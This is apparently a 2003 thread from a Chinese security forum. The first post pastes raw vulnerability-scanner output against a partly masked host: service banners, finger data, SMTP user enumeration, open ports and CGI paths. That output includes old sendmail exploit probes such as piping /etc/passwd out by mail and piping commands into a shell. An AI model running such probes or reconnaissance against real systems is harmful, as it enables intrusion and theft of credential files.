|
作者: word [word] 论坛用户 | 登录 |
探测主机:210.5.16.*** 检测 SMTP-> 支持VRFY 检测 SMTP-> 支持EXPN 服务检测 HTTP-> Apache/1.3.12 (Unix) (Black Cat/Linux) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP/4.0.0 rus/PL29.4 服务检测 POP-> +OK POP3 hyvision.com v7.64 server ready 服务检测 IMAP-> * OK hyvision.com IMAP4rev1 v12.264 server ready 服务检测 SMTP-> 220 hyvision.com ESMTP Sendmail 8.10.1/8.10.1; Sat, 22 Feb 2003 16:26:04 -0500 检测 FINGER-> 210.5.16.*** OK.... Login Name Tty Idle Login Time Office Office Phone root root *1 74d Dec 10 08:37 root root *2 2:07 Feb 20 15:51 检测 SMTP-> 210.5.16.*** VRFY admin ...OK 检测 SMTP-> 210.5.16.*** EXPN www ...OK 检测 SMTP-> 210.5.16.*** EXPN root ...OK 检测 SMTP-> 210.5.16.*** EXPN news ...OK 检测 SMTP->210.5.16.*** 501 5.0.0 HELO requires domain address检测 SMTP-> 210.5.16.*** EXPN admin ...OK 检测 SMTP->210.5.16.*** 检测debug漏洞 500 5.5.1 Command unrecognized: "debug"检测 SMTP-> 210.5.16.*** VRFY news ...OK 检测 SMTP-> 210.5.16.*** VRFY root ...OK 检测 SMTP-> 210.5.16.*** VRFY www ...OK 检测 SMTP->210.5.16.*** 检测kill漏洞 500 5.5.1 Command unrecognized: "kill"检测 SMTP->210.5.16.*** 检测wiz漏洞 500 5.5.1 Command unrecognized: "wiz"检测 SMTP->210.5.16.*** 检测rcpt to: /tmp/.rhosts漏洞 503 5.0.0 Need MAIL before RCPT检测 SMTP->210.5.16.*** 检测+ +漏洞 500 5.5.1 Command unrecognized: "+ +"检测 SMTP->210.5.16.*** 检测RSET漏洞 250 2.0.0 Reset state检测 SMTP->210.5.16.*** 检测mail from: |/bin/mail hacker < /etc/passwd漏洞 553 5.1.7 |/bin/mail... Invalid sender address检测 SMTP->210.5.16.*** 检测RSET漏洞 250 2.0.0 Reset state检测 SMTP->210.5.16.*** 检测mail from: |tail|sh漏洞 553 5.1.7 |tail|sh... Invalid sender address检测 RPC-> 210.5.16.*** OK.... Program no. Name Version Protocol Port (100000) portmapper 2 TCP 111 (100000) portmapper 2 UDP 222 检测 Port-> 210.5.16.*** 端口 23 [telnet] 开放 ...OK 检测 Port-> 210.5.16.*** 端口 25 [smtp] 开放 ...OK 检测 Port-> 210.5.16.*** 端口 139 [netbios-ssn] 开放 ...OK 检测 Port-> 210.5.16.*** 端口 79 [finger] 开放 ...OK 检测 Port-> 210.5.16.*** 端口 80 [http] 开放 ...OK 检测 Port-> 210.5.16.*** 端口 443 [https] 开放 ...OK 检测 Port-> 210.5.16.*** 端口 513 [login] 开放 ...OK 发现CGI漏洞-> 210.5.16.***/?PageServices (200)...OK 发现CGI漏洞-> 210.5.16.***/?wp-cs-dump (200)...OK 发现CGI漏洞-> 210.5.16.***/?wp-html-rend (200)...OK 发现CGI漏洞-> 210.5.16.***/?wp-start-ver (200)...OK 发现CGI漏洞-> 210.5.16.***/?wp-uncheckout (200)...OK 发现CGI漏洞-> 210.5.16.***/?wp-stop-ver (200)...OK 发现CGI漏洞-> 210.5.16.***/?wp-usr-prop (200)...OK 发现CGI漏洞-> 210.5.16.***/?wp-verify-link (200)...OK 发现CGI漏洞-> 210.5.16.***/?wp-ver-diff (200)...OK 发现CGI漏洞-> 210.5.16.***/?wp-ver-info (200)...OK 发现CGI漏洞-> 210.5.16.***/ftp/ (200)...OK 发现CGI漏洞-> 210.5.16.***/images/ (200)...OK 发现CGI漏洞-> 210.5.16.***/work/ (200)...OK |
地主 发表时间: 02/22 16:31 |
回复: bidisty [bidisty] 论坛用户 | 登录 |
我不明白你要问什么? |
B1层 发表时间: 02/22 17:17 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号